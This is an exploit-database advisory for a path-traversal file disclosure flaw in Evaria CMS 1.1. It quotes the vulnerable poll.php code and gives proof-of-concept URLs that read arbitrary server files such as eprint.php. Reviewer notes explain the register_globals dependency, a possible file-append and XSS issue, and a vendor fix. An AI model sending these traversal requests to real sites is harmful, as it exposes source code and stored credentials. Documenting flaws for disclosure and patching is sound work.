[webapps / 0day] - Evaria Content Management System 1.1 File Disclosure Vulnerability
Posted on 01 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Evaria Content Management System 1.1 File Disclosure Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Evaria Content Management System 1.1 File Disclosure Vulnerability by khayeye shotor in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>==================================================================
Evaria Content Management System 1.1 File Disclosure Vulnerability
==================================================================
# Exploit Title: File Disclosure (arbitrary file read via path traversal in admin/poll.php). The sink is PHP's file(), not include()/require(), so this is an arbitrary file read and not a local file include: the file is read and returned as lines, never executed.
# Date: 2010-10-01
# Author: khayeye shotor
# Software Link: http://www.evaria.com/en/?view=download&dload=1
# Version: Evaria Content Management System v.1.1
# Thanks: khayeye sag , kandome mivei , sinehaye amam and all amehaye irani
-----------
vul code: /path/admin/poll.php (excerpt only: it starts inside a switch and ends inside display_form(), and the backslashes escaping the double quotes inside the echo strings were lost when the listing was pasted)
$file_contents = file("admin/".$current_poll); if (((isset($vote_logging))) && (($vote_logging == 1) || ($vote_logging == 3))) { foreach ($file_contents as $line) { if (eregi($REMOTE_ADDR, $line)) { display_form(); 
echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0"> <TR> "; echo " <TD class="poll_status" align="center">" . $already_voted . "</TD> "; echo " </TR> </TABLE> "; $set_already_voted = 1; $vote_allow = 0; break; } } } if (((isset($vote_logging))) && (($vote_logging == 2) || ($vote_logging == 3))) { if ((isset($voted)) && ($voted == "on")) { if (!$set_already_voted) { display_form(); echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0"> <TR> "; echo " <TD class="poll_status" align="center">" . $already_voted . "</TD> "; echo " </TR> </TABLE> "; } $vote_allow = 0; break; } } if ($vote_allow) { $poll_string = $vote . "|" . $REMOTE_ADDR . " "; $fp = fopen("admin/".$current_poll, "a"); $string_size = strlen($poll_string); if (fputs($fp, $poll_string, $string_size)) { display_form(); echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0"> <TR> "; echo " <TD class="poll_status" align="center">" . $vote_cast . "</TD> "; echo " </TR> </TABLE> "; } fclose($fp); } } break; case "default": display_form(); break; } } // Display poll form if no view is called upon... if (!isset($mode)) { display_form(); } elseif ((isset($vote) == 0) && (isset($mode))) { display_form(); echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0"> <TR> "; echo " <TD class="poll_status" align="center">" . $no_selection . "</TD> "; echo " </TR> </TABLE> "; } function display_form() { global $config; global $no_voting; global $QUERY_STRING; echo "<FORM name="poll" action="?" . $QUERY_STRING . "" method="post"> "; echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0"> "; echo " <TR> "; $answers = file("admin/".$config);
------------------------------------------------
poc:
/admin/poll.php?config=../../eprint.php
/admin/poll.php?config=[local file]

Notes (reviewer):
- The sink is file("admin/".$config) inside display_form(). $config only enters the function through "global $config" and is never assigned from $_GET/$_POST anywhere in the shown code, so the PoC presumably depends on register_globals being on (or on an extract() of the request elsewhere in the CMS). Confirm this on the target before reporting the finding as exploitable.
- file() reads the target into an array of lines; it does not include or execute it. The realistic impact is disclosure of server-side source and whatever credentials it holds (the PoC reads eprint.php). Whether the lines are actually echoed back depends on how the rest of display_form() uses $answers, which is cut off above.
- "admin/" is a relative path, resolved against the working directory poll.php runs under rather than the script's own directory, so the number of ../ segments may need adjusting per target.
- $current_poll is handled the same way: it reaches file("admin/".$current_poll) and fopen("admin/".$current_poll, "a") followed by fputs() of $vote . "|" . $REMOTE_ADDR. Under the same register_globals assumption the vote path looks like an append of attacker-chosen text to an attacker-chosen file, which would be more serious than the read; the excerpt does not show where $vote_allow is set, so this is unverified.
- display_form() also echoes $QUERY_STRING raw into the form's action attribute without htmlspecialchars(), which looks like reflected XSS if that variable is the request's query string. eregi() is deprecated and is being used as a regex match on $REMOTE_ADDR, so the IP check is also fragile.
- Fix (vendor): read input explicitly from $_GET/$_POST and never let a request value choose a path: `$config = basename((string) $config); if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9_.-]*$/', $config)) { exit; }` and then require realpath("admin/".$config) to start with realpath("admin") before calling file(); apply the same to $current_poll, and wrap $QUERY_STRING in htmlspecialchars() before echoing it.
# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-01]</pre></body></html>